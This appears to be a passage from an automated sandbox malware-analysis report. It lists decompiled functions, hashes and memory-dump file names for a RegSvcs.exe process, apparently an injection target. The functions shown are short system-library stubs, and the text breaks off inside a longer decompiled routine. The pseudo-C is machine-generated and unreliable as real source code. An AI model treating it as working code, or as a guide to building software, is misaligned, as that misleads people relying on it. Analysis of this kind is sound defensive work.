String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 66894be03cead062dc1da84c98cb75d76e0eeb1d867cd40eea69cfa8eb6d61df
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 5EC02B70150480BBD7152F30CD45F14B254F700B31F6803547221465F0D53CED00F100

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4190 Relevance: .0, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE4190() {

				if(E00FD7D50() != 0) {
					return  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x14));
				} else {
					return  *0x7ffe02d0;
				}
			}

0x00fe4197
0x0102641c
0x00fe419d
0x00fe41a2
0x00fe41a2

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
Instruction ID: 6b4f18a6bfe497156630f95915a884b0498a18b63dbac255fae81591f8e95364
Opcode Fuzzy Hash: 175590c6a7dfeeadbeeb5abb91333881fb225fd9a6b890b8f217439b73e8cc0c
Instruction Fuzzy Hash: 9EC04C357116408FCF16DB29C684F1537E5BB45744F1508D0EC45DB726EA24E840DA10

Uniqueness

Uniqueness Score: -1.00%

Function 00FD7D50 Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x00fd7d56
0x00fd7d5b
0x00fd7d60
0x00fd7d5d
0x00fd7d5d
0x00fd7d5d

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 6557ee8d35bf6864e007fae7c3753484ef2c00f8bec33bbda4f95a11b0fec537
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: B9B09234301A408FCE16EF18C080B1533E5BB45B40B8800D4E800CBA20E229E8009900

Uniqueness

Uniqueness Score: -1.00%

Function 00FE2ACB Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FE2ACB() {
				void* _t5;

				return E00FCEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x00fe2adc

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: bdd67df77f59030b9c1ae8d5e137f860e1c45ac11306928031de95b7f242bd9a
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: D0B01232C10441CFCF02EF40CB11F297331FB40750F054494A00127931C22CAC11DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FF98A0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65303734c072e0818125c046656caa3205d188580a198bdc0df5d1ccfff4cf22
Instruction ID: d302cb1028bf5bb38948226f2e3c1428a1ef02a5ba871c5bdd4e6900690c025b
Opcode Fuzzy Hash: 65303734c072e0818125c046656caa3205d188580a198bdc0df5d1ccfff4cf22
Instruction Fuzzy Hash: 5B90026130100902E10361D98414A060109E7D1385F91C012E1814559DC6A58953B272

Uniqueness

Uniqueness Score: -1.00%

Function 00FFB040 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f28110d99528165f6b2feefa2916aaa62c6838b954c3fdd8cb5bc77e54923d4
Instruction ID: 2f33c5ce713ce4e1989ceea29b43f20b9692397965922bec346203b1c78201d1
Opcode Fuzzy Hash: 3f28110d99528165f6b2feefa2916aaa62c6838b954c3fdd8cb5bc77e54923d4
Instruction Fuzzy Hash: 6F9002A1601145435541B1D988048065115B7E1341791C121A0844564CC6E88855A3B5

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9820 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8dc1fe83f6dfbd0148361cd410c115d9e28be3f678026d9ee9c91caebaea1ae
Instruction ID: 03a2323f829d978c50e6fa5d1dd55461c4b425222ae6265b5874e24ecec22a32
Opcode Fuzzy Hash: c8dc1fe83f6dfbd0148361cd410c115d9e28be3f678026d9ee9c91caebaea1ae
Instruction Fuzzy Hash: A090027124100902E14271D98404A060109B7D0281F91C012A0814558EC6D58A56BBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF99D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0de6cb1b3fff6cb5204e65f7a4a8a9566eb1a2d61acf51c27c4a7b091f937fe
Instruction ID: a3316d5d2381f302724e9c8767e4d3f7860ed894d474e430c0ef919da4a91940
Opcode Fuzzy Hash: b0de6cb1b3fff6cb5204e65f7a4a8a9566eb1a2d61acf51c27c4a7b091f937fe
Instruction Fuzzy Hash: 2F9002A121100542E10561D98404B060145A7E1241F51C012A2544558CC5A98C616275

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6c5a30f572651933770f32e8ee9df8c221cf6153a4eeb00c01a3b3e63a7b7ea
Instruction ID: cf1deafc0122c99d432740c8930b248bcc790d29f6acf6cc6f3b1b3419a202c4
Opcode Fuzzy Hash: a6c5a30f572651933770f32e8ee9df8c221cf6153a4eeb00c01a3b3e63a7b7ea
Instruction Fuzzy Hash: C19002A120140903E14165D98804A070105A7D0342F51C011A2454559ECAA98C517275

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9A80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c13d1578ab85998f7bdb1f99645e2276a88083a9b5a48c69a5a04198b20019e
Instruction ID: 7df107a00573b5ae7c261cfcca4a171a07608b3bf1356ac4f2d1bf36c496c053
Opcode Fuzzy Hash: 7c13d1578ab85998f7bdb1f99645e2276a88083a9b5a48c69a5a04198b20019e
Instruction Fuzzy Hash: 0490026120144942E14162D98804F0F4205A7E1242F91C019A4546558CC99588556771

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9A10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31750fee71965db55fcab583ef3369763db9e036ea39fb55860c532832c40343
Instruction ID: 4459e13a5a705cb5c83c3b380882fc9a6c6c543e82719f442d61d7be8c9d4bdd
Opcode Fuzzy Hash: 31750fee71965db55fcab583ef3369763db9e036ea39fb55860c532832c40343
Instruction Fuzzy Hash: 1590027120140902E10161D98808B470105A7D0342F51C011A5554559EC6E5C8917671

Uniqueness

Uniqueness Score: -1.00%

Function 00FFA3B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08017c2aac3d785ea27f11a54cbcb4200115fe2faf884a88b9be1c51483248d
Instruction ID: c0dbccdbddde2f4ea9eaea507671a044c252a4ef9d2d490cc9a5122c23c1f35f
Opcode Fuzzy Hash: b08017c2aac3d785ea27f11a54cbcb4200115fe2faf884a88b9be1c51483248d
Instruction Fuzzy Hash: 6A90027120144502E14171D9C444A0B5105B7E0341F51C411E0815558CC6958856A371

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9B00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5caad18c0f8da81a5c7becaf9f4b8b0a13fa3ea8207e82c42d15666134913fce
Instruction ID: 874090bedd17bb734cc573cd805bc948697d2891632aa851a753122e2187679d
Opcode Fuzzy Hash: 5caad18c0f8da81a5c7becaf9f4b8b0a13fa3ea8207e82c42d15666134913fce
Instruction Fuzzy Hash: F790026124100D02E14171D9C414B070106E7D0641F51C011A0414558DC696896577F1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF95F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5094c7b0b44b3de10ca644c3849ff3a692d433ebcb3945ddd5ba4a11d338bf05
Instruction ID: 21fe045d224f1079dd01f52242a409da31fee665cfdde866f32abf4788bb57f7
Opcode Fuzzy Hash: 5094c7b0b44b3de10ca644c3849ff3a692d433ebcb3945ddd5ba4a11d338bf05
Instruction Fuzzy Hash: C990027120100D02E10561D98804A860105A7D0341F51C011A6414659ED6E588917271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9560 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62860e8a1a68456f9c3521970dd8ca800e2a5f3f10a76b725a95ce257ede88a6
Instruction ID: 5f0908d8a176627446db06131002f1a54426074c4e612f1d7d002d3ada6bd4f8
Opcode Fuzzy Hash: 62860e8a1a68456f9c3521970dd8ca800e2a5f3f10a76b725a95ce257ede88a6
Instruction Fuzzy Hash: D5900265221005021146A5D9460490B0545B7D6391791C015F1806594CC6A188656371

Uniqueness

Uniqueness Score: -1.00%

Function 00FFAD30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7e721489ad546b56137c952346d7f12fd268a024701b57b5ad82ab5a19d4c42
Instruction ID: 987566a27d8d7472f7a156885063aa59673d711068be529b1c1056466f24e07c
Opcode Fuzzy Hash: b7e721489ad546b56137c952346d7f12fd268a024701b57b5ad82ab5a19d4c42
Instruction Fuzzy Hash: 94900271A0500512A14171D98814A464106B7E0781F55C011A0904558CC9D48A5563F1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27138c43bd0d549890c24f3aa6b946f4ec687efb4f00a7567621eb6f5304b258
Instruction ID: da1d5da64b8d020a7279f1761a2c137905fdd5d70e5cc1d7a18f1bcf8ca4b4a2
Opcode Fuzzy Hash: 27138c43bd0d549890c24f3aa6b946f4ec687efb4f00a7567621eb6f5304b258
Instruction Fuzzy Hash: 0B9002E1201145925501A2D9C404F0A4605A7E0241F51C016E1444564CC5A58851A275

Uniqueness

Uniqueness Score: -1.00%

Function 00FF96D0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0873bfe3504a054636d5f69250886db78bd27b806086887cc8436874f38db3a
Instruction ID: bff53e0d94db3fba5501328217e22a9b50e1af356ddeeb78efdfd1dbfd088750
Opcode Fuzzy Hash: a0873bfe3504a054636d5f69250886db78bd27b806086887cc8436874f38db3a
Instruction Fuzzy Hash: E490027120100D42E10161D98404F460105A7E0341F51C016A0514658DC695C8517671

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e912b4e6f3fb56dc013cc6a2ed803a676020484a1d4c1dd0f43fc6f50b79a9
Instruction ID: 90aa9a71bd76d1bab7f8fd01491ee1e12c4ee3bc752e69dd58e3b2337eea42a1
Opcode Fuzzy Hash: d0e912b4e6f3fb56dc013cc6a2ed803a676020484a1d4c1dd0f43fc6f50b79a9
Instruction Fuzzy Hash: 4B90027120504D42E14171D98404E460115A7D0345F51C011A0454698DD6A58D55B7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9610 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fa43b85af5332e3eba6f01eb1642592c8065a7742fef3a2ce86d0a6dae9f069
Instruction ID: bb0d518134b6a4176a5ac94df669ab79a5ced3806b4418b2a381229c6e7a1133
Opcode Fuzzy Hash: 2fa43b85af5332e3eba6f01eb1642592c8065a7742fef3a2ce86d0a6dae9f069
Instruction Fuzzy Hash: 1B90027160500D02E15171D98414B460105A7D0341F51C011A0414658DC7D58A5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1410ff3eea3b9366ee5af1e401f79a3ff1b686de27f6f1cb30d3f68b2fc66dee
Instruction ID: 194d9464c1ea5ec95395b3257124c0ba665291621551a81f8c00e7135df4bf90
Opcode Fuzzy Hash: 1410ff3eea3b9366ee5af1e401f79a3ff1b686de27f6f1cb30d3f68b2fc66dee
Instruction Fuzzy Hash: 6990026120504942E10165D99408E060105A7D0245F51D011A1454599DC6B58851B271

Uniqueness

Uniqueness Score: -1.00%

Function 00FFA770 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b0d6e80d7c2e4a043e038786e3bb08361a289886ac82144fd21db90a3ff7af4
Instruction ID: 207ddba656362fe0715fed72a5524ed359ed61e7dfacab338c2c89dacc8218d4
Opcode Fuzzy Hash: 4b0d6e80d7c2e4a043e038786e3bb08361a289886ac82144fd21db90a3ff7af4
Instruction Fuzzy Hash: 9190027520504942E50165D99804E870105A7D0345F51D411A081459CDC6D48861B271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9760 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 064cb6bebfc9a087a9398496b429092b605f85dfd9a176118f2f36864b7179c6
Instruction ID: 0862e7760a36026d8e41b368489e7d2befa509f9070b61827de89fd0a183e47d
Opcode Fuzzy Hash: 064cb6bebfc9a087a9398496b429092b605f85dfd9a176118f2f36864b7179c6
Instruction Fuzzy Hash: FB90027120100903E10161D99508B070105A7D0241F51D411A081455CDD6D688517271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9730 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00441f12c51fd15987e795599e6b52ab39d65497ab63af5c245b7d7affde55bc
Instruction ID: b9eeee8800f0d911b4b1ea8dd08d5f64af7d4804cf36f62b5c04c2f1b7732b9a
Opcode Fuzzy Hash: 00441f12c51fd15987e795599e6b52ab39d65497ab63af5c245b7d7affde55bc
Instruction Fuzzy Hash: F090026160500902E14171D99418B060115A7D0241F51D011A0414558DC6D98A5577F1

Uniqueness

Uniqueness Score: -1.00%

Function 00FFA710 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 111137d7bdc2f549b3d072c7a934fc606e0399584dd784f1f28963e198c5334c
Instruction ID: 162ef17b09be3bf8a5a02aafd7d288529bbff1a5a11524f4d0c6617554257e7d
Opcode Fuzzy Hash: 111137d7bdc2f549b3d072c7a934fc606e0399584dd784f1f28963e198c5334c
Instruction Fuzzy Hash: 0190027130100552A501A6D99804E4A4205A7F0341F51D015A4404558CC5D488616271

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 8d6a5c16e973302206edb88dd69009a5affb9c10aaad1d048d77d42a1bd94f70
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00FE645B Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109
timeCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00FE645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x10ad360 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E00FFFA60( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							E00FD2280(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E00FCFFB0(_t72, _t82, _t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x10ab1e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
